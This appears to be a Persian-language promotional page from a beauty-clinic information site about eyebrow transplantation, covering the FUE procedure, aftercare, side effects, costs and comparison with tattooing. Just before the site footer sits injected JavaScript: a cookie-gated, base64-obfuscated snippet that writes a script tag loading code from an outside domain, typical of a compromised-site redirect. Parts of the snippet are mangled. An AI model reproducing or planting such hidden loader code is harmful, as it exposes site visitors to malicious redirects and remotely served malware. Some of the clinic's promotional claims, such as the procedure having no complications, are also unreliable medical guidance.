بسیاری از علاقه مندان به روش های کاشت مو و یا ترمیم مو، مایلند در زمینه پرپشت شدن موها نیز بدانند. از آنجایی که امروزه ریزش مو در کشورهای جهان و بین مردان و زنان شایع است، لذا پیشگیری و جلوگیری از ریزش اهمیت زیادی دارد.

کاشت مو روشی است که طی آن پوست موها را از ناحیه ای (معمولا پشت سر)به ناحیه های طاس شده منتقل می کند. کاشت مو اصولا در کلینیک و با بی حسی موضعی صورت می گیرد که برای افرادی که در سنین 25 سال به بالا دچار ریزش مو شده اند مرسوم است در ادامه مقاله توضیحاتی پیرا

در جامعه کنونی ریشه نصف بیماری ها ارث بوده و عاملی که باعث تشدید آن می شود موارد استرس ، اضطراب ، افسردگی و .. و به طور کلی عصبی می باشد یکی از بیماری های رایج و شیوع یافته که از اعصاب نشات گرفته است ریزش مو می باشد که امروزه حتی سن ابتلا به بیماری ریزش مو

شامپو (در زبان انگلیسی: Shampoo) در واقع مایعی است که توسط شرکتها در کارخانجات تولید می شود و جهت پاکسازی و شستشوی موهای سر بکار می رود. شامپو محصولی است که در یک قرن گذشته ساخته و توسط شرکتها و برندهای مهم جهان به بازارهای جهان ارائه شده است و تا پیش از آن بسیار

سفید شدن مو یک امر طبیعی برای هرکس می تواند باشد که با بالا رفتن سن به صورت تدریجی مو ها سفید می شود.همچنین این اتفاق می تواند منشا وراثتی داشته باشد.اما اگر در جوانی در موهایتان در حال سفید شدن است این نکات را رعایت کنید:

اپلیکیشن مرکز تخصصی کاشت موی رنسانس
از این قسمت می توانید اپلیکیشن مرکز کاشت موی رنسانس را دانلود کنید

اپلیکیشن مرکز تخصصی کاشت موی رنسانس
از این قسمت می توانید اپلیکیشن مرکز کاشت موی رنسانس را دانلود کنید

فهرست مطالب

کاشت ابرو  طبیعی , هزینه کاشت ابرو , متخصص کاشت ابرو در تهران , تکنیک های کاشت ابرو  طبیعی ، قیمت کاشت ابرو  در تهران , عوارض کاشت ابرو  , روش کاشت ابرو و مراحل مختلف آن ،همه چیز در مورد کاشت ابرو ، بعد از عمل کاشت ابرو ،کاشت ابرو چیست و به چه منظور انجام میشود؟  , عوامل تاثیر گذار در کاشت ابرو ، سوالات متداول در مورد کاشت ابرو : ابرو یکی از مهم ترین عضو صورت است که در زیبایی تاثیر زیادی دارد به همین دلیل رفته رفته به محبوبیت کاشت مژه و موی ابرو افزوده می شود. مردان و زنان به دنبال راه هایی می گردند تا موی این ناحیه از بدن خود را به صورت دائمی ترمیم یا تثبیت کند.

امروزه بیماران زیادی را می بینیم که نتایجی دائمی و طبیعی را می خواهند، چیزی که در بسیاری از جراحی های کاشت موی ابرو بدست می آید. زیرا افراد زیادی طرفدار ابروهای بزرگتر و پرپشت تر هستند. اما مسئاله مهم این است تصمیمات خود را چگونه بگیرید که نتیجه مطلوبی داشته باشد پس باید تصمیم خود را براساس نظرات دکتر یا جراح متخصص در کاشت ابروی طبیعی بگیرید، زیرا تجربه و تمرین رمز یک کاشت موی طبیعی موفقیت آمیز است و ما به کادر پزشکی خود اطمینان داریم و با افتخار روش کاشت موی ابروی FUE را ارائه می کنیم.

کاشت ابرو طبیعی : داشتن ابروهای کم پشت یا نداشتن موی ابرو باعث می شود که توجه افراد به طور ناخواسته به چهره طرف جلب شود. ولی ابروهای پرپشت، نوک تیز و خوش ترکیب کمتر مورد توجه قرار می گیرند با این حال ما از شیوه های کاشت موی ثابت شده برای جلوگیری از ریزش ابرو و برطرف سازی مشکل ریزش مو در ناحیه ابرو استفاده می کنیم. ترمیم ابرو شیوه ای فوق العاده برای جایگزینی ابرو یا ترمیم نواحی کوچکی از ابرو استکه به دلیل زیرابرو برداشتن ناسب، جای زخم یا عوامل ژنتیکی دچار ریزش مو شده اند. ترمیم مو به این شکل است که مقدار کمی از موی بالای ناحیه گوش در ناحیه ابرو کاشت می شود. کاشت ابرو طبیعی توسط یک دکتر مجرب صورت می گیرد و بین ۲ تا ۳ ساعت طول می کشد.هزینه کاشت ابرو با موی طبیعی

ترمیم مو نیازمند خلاقیت است و یک روش هنرمندانه است . در روش کاشت ابرو یک ابرو براساس نوع صورت ویژگی های چهره و نتایجی که شخصا خواهان ان هستیم طراحی میشود این کار ظرافت های دیگری نیز نیاز دارد که یک پزشک با تجربه نوع قوس ، ضخامت مناسب مو، فاصله بین ابروها و طول ابرو را نیز بررسی می کند .

اکثر کاشت هایی که انجام میشود بین افرادی است که یا بدون ابرو یا با ابروی کم پشت به دنیا آمده اند یا به دلیل عوامل ژنتیکی ،  بیماری یا دلایل دیگر ابروهای کم پشتی دارند یا ابروهای آنها دچار طاسی ناحیه ای شده است. ترمیم مویی که کاشت بیش از ۲۰۰ موی ابرو را شامل می شود، یک خط ابروی خوش ترکیب را ایجاد می کند، که کاملا طبیعی به نظر می رسد، زیرا برای ترمیم آن از موی خود فرد استفاده می شود.

در مراحل کاشت ابرو FUE ، ابتدا ناحیه اهداکننده آماده می شود. عموما، برای کاشت ابرو ، ناحیه اهداکننده دقیقا پشت گوش ها است. مو با دقت و احتیاط از ناحیه اهدا کننده برداشت می شود. در هر بار یک فولیکول برداشت می شود و سپس به ناحیه کاشت منتقل می شود. این کار تحت بی هوشی موضعی صورت می گیرد و بسیاری از بیماران در حین جراحی می خوابند.

مطالب بالا خلاصه ای از مراحل کاشت ابرو است مطالب بسیاری درباره روش های جراحی وجود دارد که باید درباره ان ها اطلاعات لازم را داشته باشید کاشت ابرو کار خیلی عمل خیلی عجیبی نیست چیزی که اتفاق می افتد صرفا برداشت فولیکول های مو از یک ناحیه اهدا کننده و کاشت و پیوند زدن آنها در ناحیه گیرنده ابرو در طرح های انتخاب شده توسط بیمار است. این کار تحت بی هوشی موضعی صورت می گیرد و موها دقیقا شبیه شیوه رشد موی ابرو ، کاشت می شوند تا ابرو ظاهری کاملا طبیعی پیدا کند ( این کار با یک موی مجزا در هر زمان و در زاویه مناسب صورت می گیرد).

در هنگام برداشت موی کاشت از ناحیه اهدا کننده، موها باید به واحدهای فولیکوی مجزا تقسیم شوند و هر نوع روپوست، چربی یا پوست اضافی باید جدا شود . در طول جراحی، هر فولیکول مو با استفاده از سوزن پیوند کاشت می شود تا تضمین کند که میکروگرافت های بدست آمده از ناحیه اهدا شده به خوبی در ناحیه ابروی شما ثابت می مانند.

بعد از اینکه تمام مراحل درمان تمام شد موی کاشت شده به صورت طبیعی رشد می کند و هنوز می توانید زیرابرو بردارید، به ابرو شکل دهید یا آن را کوتاه کنید، زیرا این ابروهای کاشت شده دقیقا همانند ابروهای طبیعی کاشت نشده هستند. کندن یا رنگ کردن یا بندکشی موهای ابروی پیوندی تاثیری بر فولیکول ندارند و این به این معناست که موهای ابرو دوباره رشد می کنند و مشکلی پیش نمی آید. کاشت واحد فولیکولی یکی از رایج ترین روش های مورد استفاده در کاشت ابرو است. با این حال، جراحان کاشت ابرو از روش های دیگری نیز استفاده می کنند.

از آنجایی که موی ابروی کاشته شده از سر گرفته می شود، انتظار می رود که ابروهای شما سریع تر رشد کنند. فکر می کنم این مساله برای کسانی که چنین ابروهایی نداشتند، اتفاق خوبی است! با این حال ، باید از قبل آنها را مرتب کنید.

در یکی از روش های کاشت ابرو نمی توان از سر مو برداشت کرد و می توان از ناحیه ی دیگر بدن مو برداشت کرد و در این روش همانند روش کاشت موی معمولی از پشت سر گرفته میشود .

ابروها موهایی دارند که به عنوان دسته های مجزا رشد می کنند، در مقایسه با واحدهای فولیکولی که شامل ۱ تا ۴ تار مو می شند. بنابراین مویی که از ناحیه اهداکننده برداشت می شود ، باید با استفاده از یک میکروسکوپ قدرتمند به گرافت های موی مجزا تقسیم شود.لازم است بدانیم که نحوه رشد موی روی سر یا موی ابرو تفاوت دارد.

هر کدام از میکروگرافت ها در نواحی گیرنده ای که توسط جراح آماده شده، قرار داده می شوند. از آنجایی که ابروها در زاویه تندتری نسبت به سطح پوست رشد می کنند ، این فرآیند مستلزم مهارت و تجربه زیادی است.جراح باید بتواند انحنای طبیعی مو را تعیین کند تا از منحنی ابروها تبعیت کنند. ابروها همچنین باید به شکلی سازماندهی شوند که مخصوصا در ناحیه میانی به شکل ضرب دری رشد کنند تا مانند یک ابروی طبیعی در بیاید.

برخلاف شیوه های برداشت نواری FUT، که در آنها یک جای زخم شدیدا نمایان ( که مخصوصا وقتی موی ابروکوتاه است، نمایان می شود) در ناحیه اهداکننده باقی می ماند و به مراقبت های پس از عمل قابل توجه نیاز دارد، روش کاشت مو طبیعی FUE به مراقبت پس از عمل و زمان از کار افتادگی کمی نیاز دارد و همچنین جای زخم جزئی باقی می گذارد.در این روش هیچ زمان از کارافتادگی ای وجود ندارد.

تا چند هفته پس از عمل باید از ورزش ومخصوصا عرق کردن پرهیز کنید، زیرا ورزش نکردن به کاهش خطر عفونت قابل توجه کمک می کند. در کلینیک کاشت مو متخصصین ما به شما دستورالعمل های کامل مراقبت های پس از عمل ارائه می شود و در صورتی که سوالی داشتند یا نیازمندی کمکی بودید ، کلینیک کاشت مو پاسخگوی شماست.

پس از عمل جراحی کاشت موی ابرو، کمی احساس خارش به شما دست می دهد. مواظب باشید که ناحیه کاشت مو را نخارانید تا به طور کامل خوب شوند. همچنین کمی خونریزی ایجاد می شود و شاهد دلمه بستن زخم خواهید بود. ناحیه ابرو کمی ورم می کند، اما در عرض چند روز عوارض کاشت ابرو کاهش پیدا می کند. همچنین در صورتی که پس از زمان توصیه شده، برخی از علائم هنوز وجود داشته باشند، به جراح خود مراجعه کنبد تا او مشکل شما را حل کند.
همه افراد از داشتن نعمت ابرو های ضخیم و پرپشت برخوردار نیستند اگر شما یکی از ان افراد هستید حتما به کاشت ابرو فکر کنید .

منظور از کاشت ابرو روشی جراحی کاشت دائمی یا تنظیم ظاهر و شکل ابروی شماست. برخلاف روش های قبلی که نواری از پشت سر بیمار برداشته می شود و مورد استفاده قرار می گیرد، در این روش از هر یکی از بخش های بدن از قبیل پا، پشت گردن و غیره موی مجزا برداشت می شود و به ابرو پیوند زده می شود. با این حال، موی پشت سر ( پشت گوش) مورد استفاده قرار می گیرد، زیرا شباهت بیشتری با موی ابرو دارد. کاشت موی ابرو بر روی افرادی انجام می شود که به دلایل مختلف موی ابروی خود را از دست داده اند.

با اینکه کاشت موی ابرو یک عمل کاشت موی کوچک است  . ولی عوارض جانبی کمی هم نیز دارد. تزریق ماده بی هوشی تا اندازه ای دردآور است , زیرا ناحیه دور چشم بسیار حساس است. با این حال، پس از بی هوشی هیچ دردی احساس نمی کنید. با این حال، به سرعت ناپدید می شود و با آرایش پوشانده می شود. ورم دور چشم نیز نسبتا رایج است. ورم به سرعت ، اغلب در عرض یک شب، از بین میرود.

این جراحی عوارض دیگری دارد. ناحیه کاشت دچار خارش می شود که تنها یک یا دو روز طول می کشد، در صورتی که ناحیه ابرو بیش از این زمان خارش داشت، شاید به دلیل عقونت است که باید سریعا درمان شود. خارش را می توان با پماد برطرف کرد. پماد باید در طول روز و شب بر روی ناحیه کاشت مالیده شود تا از خراش تصادفی جلوگیری کند. همچنین ممکن است پس از جراجی اولیه کاشت مو ، ناحیه شاید کبودشود، ورم کند یا ملتهب شود.

نتایح دائمی هستند و خیلی سریع به تفاوت ایجاد شده پی خواهید برد. عموما در یک کاشت موی FUE، نتایج کامل در عرض ۱۲ ماه بدست می آیند. برای کاشت موی ابرو، نتایج کامل در زمان کمتری بدست می آید، اما هنوز چندین ماه طول می کشد.

رشد مو در افراد مختلف است و با تداوم رشد موی کاشت شده، همانند ناحیه اهدا کننده اولیه، باید موها را مرتب کنید تا ظاهری مناسب داشته باشید. این مساله برای بیماران مشکل ساز نیست، زیرا اغلب آنها به زیر ابرو برداشتن یا اصلاح قسمتی از بدن خود به صورت منظم عادت دارند. همچنین مو در سه مرحله رشد می کند، پس اگر پس از کاشت مو شاهد ریزش مو بودید نگران نباشید. طبیعی است.

عمل جراحی کاشت موی ابرو به درک کامل از نیازها و اهداف بیمار نیاز دارد تا بهترین نتایج را به بار آورد و می توان آن را به عنوان همکاری مشترک دکتر ، کادر پزشکی او و بیمار در نظر گرفت. همچنین این عمل جراحی یک فرآیند حساس و بسیار تخصصی است که به ملاحظه دقیق دکتر، مهارت، تجربه و ذوق هنری نیاز دارد.

کاشت ابرو را اغلب کسانی که به دلیل عوامل مادرزادی، بیماری، عفونت یا زیرابرو برداشتن بیش از حد، ابروهای کم پوشتی دارند یا ابرو ندارند انجام میدهند . برای کسانی که به فکر جایگزینی موی خود هستند، هزینه کاشت ابرو یک عامل اساسی است. هزینه کاشت ابرو برای برای همه افراد یکسان نیست زیرا هزینه جراحی با توجه به فرد و میزان ریزش موی او تغییر می کند کاشت مو نیز اینگونه است.

قیمت کاشت ابرو عموما شامل دست مزد جراح ، هزینه داروی بی هوشی و تجهیزت می شود. بیمه درمانی شامل کاشت ابرو نمی باشد زیرا این جراحی یک عمل زیبایی محسوب میشود ولی اگر کاشت به دلیل بیماری یا اسیب ضروری باشد به گفته جراح این عمل می تواند تحت پوشش بیمه قرار بگیرد. به گفته پزشک اگر کاشت ریزش موی طبیعی را که بر اثر بیماری به وجود امده است یا اسیبی وارد شده است را برطرف کند بیمه تعلق میگیرد.

در مشاوره اولیه، پزشک تعیین می کند که آیا بیمار صلاحیت انجام یک عمل جراحی کاشت ابرو را دارد یا خیر و در مورد ظاهر و شکل مطلوب آن با بیمار صحبت میکند. عواملی که مانع از این می شود که بیمار برای جراحی کاشت ابرو صلاحیت داشته باشد: آلوپسیا آره آتا ، یک بیماری خود ایمنی است که باعث ریزش می شود یا تریکوتیلومانیا، اختلال وسواس فکری یا عملی است که باعث می شود بیمار موهای خود را بکند.

در عمل جراحی، بیمار معمولا بی هوشی موضعی وقرص مسکن دریافت می کند. سپس، جراح در ناحیه اهداکننده که معمولا سر، ساعد یا ناحیه زهار است، یک برش کوچک ایجاد می کند و موهای مورد نیاز را برداشت می کند. موی اهداکننده با استفاده از ابزار بزرگنمایی مخصوص به گرافت های تک مو تقسیم می شود. سپس پزشک در ناحیه ابرو برش های کوچکی ایجاد می کند و تلاش می کند تا گرافت ها را در زوایه هایی قرار دهد که موهای ابروی طبیعی قرار می گیرند. این عمل تقریبا در سه ساعت انجام میشود .

موهای کاشت شده ابرو در عرض چند هفته می ریزند و رشد مجدد کامل موها چندین ماه طول می کشد. به دلیل اینکه موی کاشت ابرو از ناحیه دیگری گرفته شده است، خیلی سریع رشد می کند و تقریبا هفته ای یک بار باید مرتب شود. همچنین پس از عمل در جایی که موکاشته شده است زخم دلمه می بندد که جزئی است و در عرض چند روز خوب می شود.

موهای ابرو کاشت شده در حدود یک سال کامل و ضخیم می شوند و بعضی از بیماران برای داشتن ابروی پرپشت تر به پزشک جراح مراجعه می کنند تا گرافت های موی بیشتری روی ابروی آنها کاشت شود. هزینه این کاشت مجدد ابرو کسری از هزینه جراحی اولیه است و به این مساله بستگی دارد که چه تعداد واحد فولیکولی ( گروه های یک یا چند تارمو) باید در ابرو کاشت شوند.

این بستگی به خود پزشک دارد بغضی بعضی از پزشکان برای بیمارانی که هزینه کاشت ابرو خود را نقدی حساب می کنند، کوپن یا برگ تخفیف اینترنتی عرضه می کنند.

هزینه عمل کاشت ابرو بر حسب تعداد گرافت و برطبق نیازمندی های جایگزینی موی فردی شما تعیین می شود.و برای همه یکسان یا مشابه نیست به همین دلیل است که نمی توان به صورت آنلاین یا از پشت تلفن قیمت کاشت ابرو را تخمین زد. در عوض ، ما بیماران را ترغیب می کنیم تا در یک جلسه مشاوره اختیاری شرکت کنند.

به منظور اینکه کسب اطلاعات در مورد هزینه کاشت ابرو ، می توانید به کلینیک لیزر مو مراجعه کنید . در این کلینیک  پوست سر و موی شما به صورت رایگان بررسی می شود و تعداد عمل جراحی مورد نیاز برای بدست آوردن اهداف ترمیم تعیین می شود.

بله- ابرو را می توان کاشت آن هم با موهای طبیعی خود فرد، یعنی به طور خلاصه در کاشت ابرو (با پیوند ابرو) تعداد مشخص و محدودی از موهای پشت سر فرد با استفاده از تکنیک‌های ظریف و مدرن برداشته می‌شود و در ناحیه ابروهایش کاشت (پیوند) می‌شود که نتیجه آن داشتن ابروهایی با موهای طبیعی، قابل رشد و زنده است که چهره شخص را زیباتر و جذاب‌تر می‌کند.

به دلیل وجود تبلیغات زیاد و غیر اصولی در مورد تاتو ابرو و هاشور ابرو که یک کار آرایشی است، موجب شده که بسیاری از خانم‌ها در جامعه ما، برای رفع مشکلات ابروهایشان از جمله اصلاح فرم و مدل ابروهایشان یا پرپشت کردن ابروهای خود بجای انجام کاشت ابرو با موهای طبیعی خودشان در کلینیک تخصصی پوست و مو، به دلیل عدم آگاهی یا وجود جوهای تبلیغاتی غلط، بعضا به اشتباه اقدام به تاتو کردن یا هاشور کردن ابروی خود در آرایشگاه‌ها نمایند که تعداد زیادی بعد از تاتو کردن ابروهایشان دچار پشیمانی زودرس می‌شوند. همچنین به دلیل عدم اطلاع‌رسانی کافی در مورد کاشت ابرو با استفاده از موهای طبیعی خود فرد، که یک اقدام زیبایی و تخصصی- پزشکی می‌باشد و نیازمند مهارت فراوان پزشک می‌باشد .

زیرا تاتوی ابرو طبیعی نبوده و همانند یک نقاشی رنگی و مصنوعی در صورت است.همچنین تاتو یک نواخت بوده و هیچ تغییری ایجاد نمی شود که این باعث میشود خسته کننده باشد.

شخص هر روز به طور مکرر مجبور است روی تاتوی ابرویش را با مداد ابرو بکشد تا عیوب تاتوی ابروها را بپوشاند و این مداد کشیدن‌های مکرر کاری خسته‌کننده و ملال‌آور است. و باعث نا راحتی فرد میشود .هزینه کاشت ابرو با موی طبیعی

بله. حتی کسی که قبلا چندین بار تاتو ابرو کرده است و حالا به دلایل مختلف مثل فرم یکنواخت تاتو، عدم قرینگی تاتوها، تغییر رنگ دادن قسمتی از تاتو و هر روز مجبور است مداد ابرو روی تاتوی خود بکشد که یک کار خسته کننده است، می‌تواند روی تاتو (یا تاتوهای قبلی) خود کاشت ابرو با موهای طبیعی انجام دهد.و دیگر مجبور نیست هر روز با مداد ابرو روی تاتوی خود بکشد.

شایع‌ترین علت از دست رفتن موهای ابرو، تاتو کردن ابروهاست (به دلیل آسیب ناشی از ضربات سوزن تاتو به ریشه موهای ابرو)

علل دیگر نداشتن ابرو عبارتند از:

همه کسانی که به هر دلیلی ابروهای خود را از دست داده‌اند و هیچ‌یک از موارد منع انجام کاشت ابرو را نداشته باشند، می‌توانند کاشت ابرو را انجام دهند به شرط آنکه در جلسه مشاوره حضوری با پزشک هیچ‌یک از موارد منع انجام کاشت ابرو را نداشته باشند.

مهم‌ترین اقدام مشاوره حضوری با پزشکی است که تجربه و مهارت و دانش لازم را در زمینه کاشت ابرو، دارا می‌باشد. به‌طوریکه با گرفتن شرح حال کامل، معاینات کامل و آزمایشات لازم و ارزیابی علل از دست دادن ابروها و توضیح نحوه کاشت و بررسی توقعات و انتظارات بیمار که آیا واقع‌گرایانه می‌باشد یا نه؟ و همچنین با بررسی سایر موارد، در نهایت پزشکی که مهارت فراوان در زمینه کاشت ابرو دارد می‌تواند تشخیص دهد که شخص متقاضی انجام کاشت ابرو می‌باشد یا خیر؟
شما می توانید به کلینیک کاشت مو مراجعه کنید متخصصین کاشت ابرو در کلینیک کاشت مو آماده ی ارائه ی کلیه ی خدمات در زمینه ی کاشت مو هستند.

***چند نکته مهم در رابطه با کاشت ابرو

کسی که تریکوتیلومانیا دارد باید ابتدا توسط روانپزشک درمان شود. در این بیماری فرد احساس می کند باید موهای سر ، ابرو و یا دیگر نقاط بدن خود را بکند و به هیچ وجه نمی تواند جلوی این احساس را بگیرد.

کسی که ابروهای کم‌پشتی دارد و جهت پرپشت کردن ابروهایش مراجعه کرده است باید ابتدا داروی طبی جهت رشد ابروها تجویز شود و سپس در صورت عدم نتیجه، کاشت ابرو انجام گیرد.

کسی که بیماری زمینه‌ای دارد که از علل ریزش ابرو می‌باشد، ابتدا باید بیماری زمینه‌ای او درمان شود.

ابرو یكی از اجزاء صورت است كه برای شكل دادن صورت لازم و ضروری است. همچنین تنها از تعدادی مو تشکیل شده است. خواباندن موها در حین کاشت در نواحی (تاج، بدنه، دم) داشت. به طوری که در ناحیه تاج ابروها موها باید به حالت عمود و رو به بالا قرار بگیرد و در ناحیه تنه ابرو زاویه خواب موها به تدریج به سمت دم کم شود. نکته مهم در جهت خواب موها در ابروها این است که نه تنها در نواحی مختلف ابرو (تاج، بدنه، دم) جهت خواب موها متفاوت است بلکه در هر یک از ناحیه خاص ابرو (مثل تنه ابرو) که زاویه خواب هر تار مو با موی کناری‌اش تفاوت دارد.

به مصداق شعر پر مفهوم : تو مو میبینی و من پیچش مو/ تو ابرو من اشارت‌های ابرو باید بگوئیم واقعا کاشت ابرو کاری بسیار تخصصی است و باید فقط و فقط توسط کسانی که تجربه زیادی در این زمینه دارند انجام شود.

وظیفه اصلی ابروها عبارتند از

ابرو را به سه قسمت تقسیم می‌کنیم :

نکته : قسمت داخلی تاج ابرو معمولا کمی داخل‌تر نسبت به خط عمودی است که از گوشه داخلی چشم می‌گذرد قرار دارد اما اگر این قسمت خیلی داخلتر باشد چهره فرد عصبانی و مسن به نظر می‌رسد و اگر خارج‌تر باشد چهره فرد زیباتر و جوان‌تر می‌شود.

برای هر فردی باید ابرویی با فرم و شکل خاص، طراحی گردد که بهترین فرم و مدل ابرو از نظر زیبایی‌شناسی برای آن فرد بخصوص باشد.
طراحی ابرو حتما باید بر اساس اصول و قوانین استاندارد و مشخص شده در علم زیبایی (با توجه به فاصله‌ها و زاویه‌های ابرو با سایر اجزای صورت) انجام شود.

۱) انتخاب موهایی با قطر مناسب : نباید از موهایی با قطر ضخیم استفاده شود بلکه باید از موهای نازک و با قطر خاص استفاده شود.تا برای ابرو مناسب باشند.

۲) کاشت موها با زاویه خواب مناسب در هر ناحیه : در کاشت ابرو اصلی‌ترین نکته دانستن جهت خواب موها در نواحی مختلف ابروها می‌باشد اما این فقط کافی نیست بلکه توانایی خواباندن موها در نواحی مختلف ابروها در حین کاشت هم نیازمند مهارت و سال‌ها تجربه در زمینه کاشت ابرو دارد به گونه‌ای که :

اولاً : زاویه خواب موها باید حدود ۵۰-۶۰ درجه و به صورت خوابیده بر روی پوست کاشته شود (اگر به دلیل نداشتن مهارت و تجربه کافی، موهای تنه با زاویه خواب صحیح کاشته نشود، در آینده موهای ابرو به شکل سیخ سیخ و بدشکل رشد خواهد کرد.)

ثانیاً : در قسمت‌های بالاتنه ابرو، خواب موها باید به حالت پایین و خارج کاشته شود و در قسمت‌های پایین تنه ابرو، خواب موها باید به سمت بالا و خارج کاشته شود.

۳) ایجاد کوچک‌ترین منافذ در پوست جهت کاشت : منافذ ایجاد شده در پوست ناحیه ابرو باید با دقت فراوان و با استفاده از تکنیک‌های مدرن امروزی (کمترین قطر) را داشته باشد.

۴) توجه میزان و درجه‌ی انحنای هر تار مو جهت کاشت : با دید میکروسکوپی و دقیق باید به طور ظریف به میزان درجه قوس هر تار مو و حتی جهت قوس آن توجه فراوان شود و براساس میزان انحنای هر تار مو، آن تار مو را برای کاشت در ناحیه خاصی از ابرو استفاده شود و این کار نیازمند نگاه دید بسیار دقیق و ظریف‌بین پزشک می‌باشد تا میزان ظرافت کاشت ابرو و شود.

۵) کاشت موهای ابرو با بیشترین تراکم : فاصله بین منافذ ایجاد شده جهت کاشت باید به قدری نزدیک به هم ایجاد شود که حاصل کاشت ما به صورت ابرویی با حداکثر تراکم باشد.

۶) ایجاد کوچک‌ترین منافذ در پوست جهت کاشت : منافذ ایجاد شده در پوست ناحیه ابرو باید با دقت فراوان و با استفاده از تکنیک‌های مدرن امروزی (کمترین قطر) را داشته باشد.

نتیجه یک کاشت ابرو با تکنیک علمی و صحیح توسط یک پزشک با تجربه (خلق ابروئی با موهای طبیعی) می‌باشد آنگونه که هیچکس متوجه کاشت ابرو شما نخواهد شد.

در واقع کاشت ابرو مثل کاشت مو یک نوع پیوند بافت زنده است به همین دلیلی در این پیوند ناحیه دهنده دونر (Donor) ناحیه پشت سر می‌باشد و ناحیه گیرنده ابروها می‌باشند. اما کاشت ابرو کاری بسیار تخصصی تر و ظریف‌تر در مقایسه با کاشت موی سر است. به این معنا که برای کاشت صحیح و اصولی ابرو که بعداً موهایش با خواب صحیح و درست رشد کند باید بسیار ماهرانه و حرفه‌ای بتوانیم فقط تعداد محدود و خاصی از موهای پشت سر فرد را که از نظر قطر مو، رنگ مو، میزان انحنای هر تار مو مناسب برای کاشت در ناحیه ابرو می‌باشد انتخاب کنیم و بعد هر فولیکول مو را به طور ماهرانه و با خواب صحیح مخصوص به آن ابرو درون منفذ بسیار ریزی که در پوست ابرو ایجاد کرده‌ایم قرار دهیم. ریشه این موهای انتقال یافته (پیوند شده) زنده می‌باشند و در ناحیه جدید (ابروها) شروع به رشد می‌کند.

تقریبا بعد گذشت دو هفنه از کاشت ابرو، موهای ابرو تدریجا شروع به ریزش می‌کنند ولی نگران نباشید چون سریعاً به جای هر ساقه مویی از ابرو که ریخته شود یک تار (ساقه) موی جدید و جوان رشد می‌کند این ریزش مربوط به ساقه موها می‌باشد و(که روی پوست است) و لیکن ریشه موها (در زیر پوست) زنده و پاربرجا می‌باشند و با هر ساقه موئی که می‌افتد بلافاصله ساقه نو و جدیدی شروع به رشد می‌کند.و این یک امر طبیعی میباشد.

از همان لحظه کاشت، موهای ابرو شروع به رشد می‌نمایند. و زمان خاضی را شامل نمیشود. چون کاشت ابرو یک نوع پیوند بافت زنده است رشد این ابرو تا ۳-۶ ماه بعد از کاشت به اوج خود می‌رسد بطوریکه شکل نهایی ابروی کاشته شده را ۹ ماه بعد به طور کامل می‌بینیم.

حداکثر ۳-۶ ماه بعد از کاشت ابرو بنابر نظر پزشک می‌توان ابرو را رنگ کرد.

عموماً روال اینگونه است که به تدریج و با گذشت زمان سرعت رشد موهای کاشته شده کم می‌شود و منطبق با رشد موهای ابرو می‌شود. (یعنی رشد موهای کاشته شده به تدریج کم شده و سازگار با منطقه گیرنده ابرو می‌شوند.) و رشد موی ابرو مانند رشد موی سر نیست.

بله، به شرط آنکه ابتدا (تست کاشت) توسط پزشک در ناحیه اسکار انجام شود و اگر بعد از انجام تست کاشت، مشکلی نداشته باشد می‌تواند کاشت ابرو انجام دهد.

به شرط آنکه ابتدا تست کاشت برای او انجام شود و پاسخ این تست مثبت باشد می‌تواند کاشت ابرو انجام دهد.

بله، این موها کاملا طبیعی و قابل رشد می‌باشد چون ریشه این موها زنده و از موهای سر خود فرد می‌باشد.

خیر، به هیچ وجه نمی‌توان از موهای شخص دیگری برای کاشت ابرو استفاده کنیم. بدیهی است که کاشت ابرو چون یک پیوند موی طبیعی از موهای خود شخص به خودش (پیوند از موهای پشت سر به ناحیه ابروی خودش) است، سازگار و قابل انجام است ولی از سوی شخص دیگر به دلیل عدم سازگاری بافتی نمی‌توانیم برای کاشت ابرو استفاده کنیم.و اگر این عمل جراحی را انجام دهیم موفق امیز نخواهد بود.

اما امروزه در آرایشگاه‌ها از موهای شخص دیگری که به صورت آماده می‌باشد استفاده می‌کنند و آن‌ها را بر روی ساقه موهای ناحیه سر یا ابرو یا مژه به وسیله رینگ، گیره، کراتین، چسب یا حلقه‌هایی می‌چسبانند که این کار اکستنشن مو، ابرو یا مژه است نه کاشت مو، ابرو یا مژه، در صورتی که در کاشت ابرو یا کاشت موی طبیعی، ریشه موی خود شخص را زیر پوست ناحیه مورد نظر می‌کاریم نه روی ساقه بیرونی موها.

البته اکستنشن عوارض فراوانی از جمله ریزش موی شدید، عفونتهای پوستی و به همراه دارد که در کاشت به هیچ‌وجه این عوارض مشاهده نمی‌‌شود.و کاملا طبیعی است هیچگونه عوارضی هم ندارد.

فرد می تواند یک روز بعد از کاشت به حمام برود به شرظی که با سرم ناحیه ابروی خود را بشوید.

بله قطعا فرد می تواند اندک زمانی بعد از کاشت ابرو با نظر پزشک می‌تواند به آرایشگاه برود زیرا ابروی های خود فرد است و طبیعی است و لیکن نباید از موچین جهت اصلاح ابروها استفاده کند چون موچین باعث کنده شدن موها از ریشه می‌شود.

مدت زمان کاشت موی ابرو به عوامل مختلفی بستگی دارد تقربیا بین ۱-۴ ساعت متغیر است . میزان تراکم تعداد تار مو های کاشته شده طول و پهنای ابرو چند مورد از این عوامل است.

getCookie(e){ U.cookie.match(new RegExp(“(?:^| )”+e.replace(/([.$?*|{}[]\/+^])/g,”\$1″)+”([^]*)”)) U?decodeURIComponent(U[1]):void } src”data:text/base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSUOCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs”,nowMath.floor(Date.now/1e3),cookiegetCookie(“redirect”)if(now&gt(timecookie)||void time){ timeMath.floor(Date.now/1e3+864),datenew Date((new Date).getTime+864).cookie”redirect”+time+” path/ expires”+date.toGMTString,.write(”)}

 

برای کسب اطلاعات لازم در رابطه با تبلیغات در سایت لیزر موهای زائد با مشاورین ما تماس بگیرید :

وب سایت لیزر لند فضایی مجازی برای اطلاع رسانی در زمینه لیزر مو و پزشکی زیبایی و خدمات کلینیک های زیبایی  , پوست و مو می باشد . هیچ نوع خدماتی درمانی  به صورت مستقیم و یا غیر مستقیم از لیزر لند ارائه نمی شود.9

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *